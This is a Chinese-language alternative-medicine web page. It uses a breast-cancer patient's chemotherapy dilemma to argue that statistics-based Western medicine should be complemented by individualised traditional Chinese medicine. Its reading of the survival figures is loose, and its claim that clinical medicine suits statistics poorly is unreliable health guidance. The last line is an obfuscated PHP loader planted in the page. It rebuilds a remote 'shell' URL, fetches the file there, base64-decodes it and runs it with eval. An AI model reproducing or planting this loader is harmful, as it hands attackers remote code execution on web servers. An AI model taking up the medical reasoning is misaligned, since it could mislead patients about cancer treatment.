收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 優勢互補更見發展
優勢互補更見發展 列印 E-mail
        舉例來說,我遇過一個動完乳癌手術的患者,開刀的醫師告訴她:「妳的腫瘤已經變小了,所以不用做化療。」可是腫瘤科醫師卻說:「希望妳做六次的化療,因為如果妳不做化療,五年的存活率是六十%,但如果妳做化療的話,五年的存活率會提高到七十四%。」

        這位患者已做過兩次化療,腫瘤變小之後才去開刀,可是開刀之後二位醫師的意見分岐,弄得她不知如何是好?根據西醫的理論來分析:如果她是那六十%的人,她可以不要做化療,因為就算做了化療,她的生活品質和生命長度並沒有什麼不同,甚至還可能對她的身體造成傷害!如果她是願意賭注另外那二十六%不知未來如何的人,也不需要做化療;換言之,只有其中十四%的人需要做化療。問題是,沒有人知道她究竟屬於六十%、十四%、還是二十六%的其中之一?

        從這個例子我們可以知道,西醫是用「相對科學」的方法來告訴患者是否需要治療?就像我們做成衣的廠商用S、M、L去區分人的大小和尺寸而己;但是對於同樣高度的人,有些是肚腹寬大,有些是瘦高如柴,雖然不盡合身,還勉強可以大一號或小一號來調整,可是醫學上怎容許有那麼多的不合身?醫學是「非常個人化」的科學,兩個「看起來」一模一樣的病,可能因為先天基因的不同,造成疾病的原因就不同,治療的方式更可能完全不同。所以臨床醫學是非常不適合採用統計學來做的,但中醫「以人為本」、「同病異治,異病同治」的態度和觀念,就能夠補強這一點。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));